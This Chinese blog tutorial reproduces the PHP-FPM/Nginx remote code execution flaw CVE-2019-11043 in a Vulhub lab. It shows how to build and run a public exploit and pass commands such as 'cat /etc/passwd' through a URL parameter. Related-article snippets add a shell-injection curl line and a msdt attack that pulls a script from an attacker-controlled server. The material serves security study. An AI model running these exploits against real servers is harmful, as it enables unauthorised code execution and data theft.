CVE-2019-11043(PHP远程代码执行漏洞)复现

最新推荐文章于 2023-07-13 20:02:29 发布
最新推荐文章于 2023-07-13 20:02:29 发布
阅读量1.8k 收藏 8
点赞数 5
分类专栏: 渗透测试 文章标签: RCE漏洞 PHP CVE-2019-11043 渗透测试 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128271912
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043(PHP远程代码执行漏洞)复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2019-11043(PHP远程代码执行漏洞)简介

CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。
关于该漏洞详细分析可参考文章:CVE-2019-11043 Nginx配置详解
该漏洞普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间。

二、CVE-2019-11043(PHP远程代码执行漏洞)漏洞环境搭建

为了复现该漏洞,我们首先需要搭建该漏洞环境。我们使用Vulhub来搭建该漏洞环境。安装完Vulhub后,我们可以在Vulhub的PHP目录下,找到该漏洞,如下所示:
在这里插入图片描述
进入该漏洞目录后,我们执行命令:

docker-compose build

即可构建该漏洞,该命令执行结果如下所示:
在这里插入图片描述
之后,我们执行命令:

docker-compose up -d

即可大概该漏洞的环境,该命令执行结果如下所示:
在这里插入图片描述
打开该漏洞环境后,执行命令:

docker-compose config

在这里插入图片描述
可以查看该漏洞的docker配置,之后,我们可以使用浏览器访问,该漏洞页面如下所示:
在这里插入图片描述

三、CVE-2019-11043(PHP远程代码执行漏洞)漏洞利用工具安装

为了利用该漏洞,我们使用Github上该漏洞的公开POC。首先,我们git克隆该poc的安装包,执行命令:

git clone https://github.com/neex/phuip-fpizdam.git

该命令执行结果如下图所示:
在这里插入图片描述
下载后,可以看到本地出现了phuip-fpizdam的目录,如下所示:
在这里插入图片描述
该目录内文件如下所示:
在这里插入图片描述
之后,我们需要编译该环境,进入该目录后,执行命令:

go env -w GOPROXY=https://goproxy.cn
go get -v && go build

注意,上述过程需要本地安装golang语言环境,相关过程可以参考文章:Kali Linux安装go语言环境详解
上述命令执行结果如下所示:
在这里插入图片描述
这样,我们的漏洞利用POC就安装完成了。

四、CVE-2019-11043(PHP远程代码执行漏洞)复现

最后,我们就可以复现CVE-2019-11043(PHP远程代码执行漏洞)了。在该目录中,执行命令:

go run . "http://192.168.136.13:8080/index.php"

执行结果如下所示:
在这里插入图片描述
之后,我们就可以在该页面中,使用参数a来传递执行的命令了。例如,我们要查看/etc/passwd文件的内容,就可以构造如下的poyload:

http://192.168.136.13:8080/?a=cat%20/etc/passwd

执行后结果如下所示:
在这里插入图片描述
注意:由于受到php-fpm多个子进程影响,我们需要访问到php-fpm受污染的子进程才会使得上述payload执行成功,因此我们有时需要多访问几遍,才会出现相关结果。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2019-11043PHP-FPM在Nginx特定配置下远程代码执行漏洞
冠霖L的博客
11-03 587
0x00 漏洞介绍 nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info模块,在处理带%0a的请求时,对换行符\n 处置不当使得将PATH_INFO值置为空,从而导致可以通过FCGI_PUTENV与PHP_VALUE相结合,修改当前的php-fpm进程中的php配置,在特殊构造的配置生效的情况下可以触发任意代码执行。 0x01 影响范围 ...
CVE-2019-11043 PHP在Nginx配置下任意代码执行漏洞
潜心学安全的小白
10-26 738
目录漏洞背景漏洞影响版本漏洞成因漏洞复现环境搭建① github下载vulhub② 启动漏洞环境③ 安装go语言漏洞利用修复建议参考链接 漏洞背景 2019年10月23日,PHP 官方发布了在 nginx 配置不当的情况下php-fpm 可导致远程代码执行漏洞更新。 此漏洞是由国外安全研究员 Andrew Danau 在9 月14日至18日举办的Real World CTF 中解决一道CTF题目...
PHP-FPM远程命令执行CVE-2019-11043)getshell——漏洞复现
W小哥
12-16 841
一、漏洞原理 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行。(当nginx配置不当时,会导致php-fpm远程任意代码执行。) 二、环境搭建 使用vulhub搭
CVE-2019-11043-Docker
04-25
带有易受攻击PHP-FPM版本(CVE-2019-11043)和nginx的docker映像。 跑步 docker run --rm -p8080:80 akamajoris/cve-2019-11043您应该能够通过以下网址访问Web应用程序: 。 开发 从https://github.com/neex/phuip-fpizdam构建二进制文件,然后 root@debian:~/gopath/bin# curl "localhost:8080/?a=/bin/sh+-c+'which+which'" 1 root@debian:~/gopath/bin#./phuip-fpizdam http://localhost:8080/index.php 2019/10/24 08:53:00 Base status code is 200 2019/10/24 08:53:00 Status
CVE-2019-11043:Neex的(PoC)CVE-2019-11043 Python版本
03-08
PoC CVE-2019-11043 CVE-2019-11043漏洞利用的Python版本 此PoC仍然是草稿,请使用编写的漏洞利用漏洞分析: : PoC设定 只需运行docker compose即可启动nginx和php-fpm: # docker-compose up -d Creating network " cve-2019-11043-git_app_net " with driver " bridge " Creating php ... done Creating nginx ... done 如果您想阅读php-fpm日志,可以运行: docker logs --tail 10 --follow php 开发 # python3 exploit.py --url http://localhost/index.php [ * ] QSL candidate:
php定时执行代码漏洞_PHP远程代码执行漏洞(CVE201911043)复现
weixin_39755873的博客
01-10 286
漏洞详情漏洞说明#‍‍‍‍‍‍是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发‍‍‍‍‍‍漏洞编号#CVE-2019-11043影响范围#在 Nginx + PHP-FPM 环境下,...
CVE-2019-11043PHP远程代码执行漏洞
m0_51468027的博客
02-12 8746
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
CVE-2019-11043 漏洞复现
Jay17的博客
07-13 646
CVE-2019-11043 漏洞复现
CVE-2019-11043 Nginx配置详解
永远是少年
12-11 808
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043 Nginx配置详解。 一、Nginx处理PHP文件与Fastcgi 二、Nginx配置中location相关含义 三、CVE-2019-11043漏洞原因
CVE-2019-11043复现
hhiollk的博客
03-31 539
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311)
paidx0
08-09 462
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
CVE-2019-11043 复现ctfshow
giaogiao123的博客
04-28 168
首先确定是cve 2019-11043 从网上找资料来打,yu师傅的博客 https://blog.csdn.net/miuzzx/article/details/111409718?spm=1001.2014.3001.5501 还有https://paper.seebug.org/1063/ 加上自己的遇到的一些问题 首先我们先安装go环境,文件太大你是拖不进去kali的,尝试使用xshell和xfpt 失败 从网上了解到,xshell无法直接连接kali 的 root权限 需要先改一下文件配置 参考这
cve-2019-11043复现(靶机为Ubuntu18.04,php编译安装)
ckm1607011的博客
02-29 860
最近做的项目需要复现nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp; 这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了; 让我感到...
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值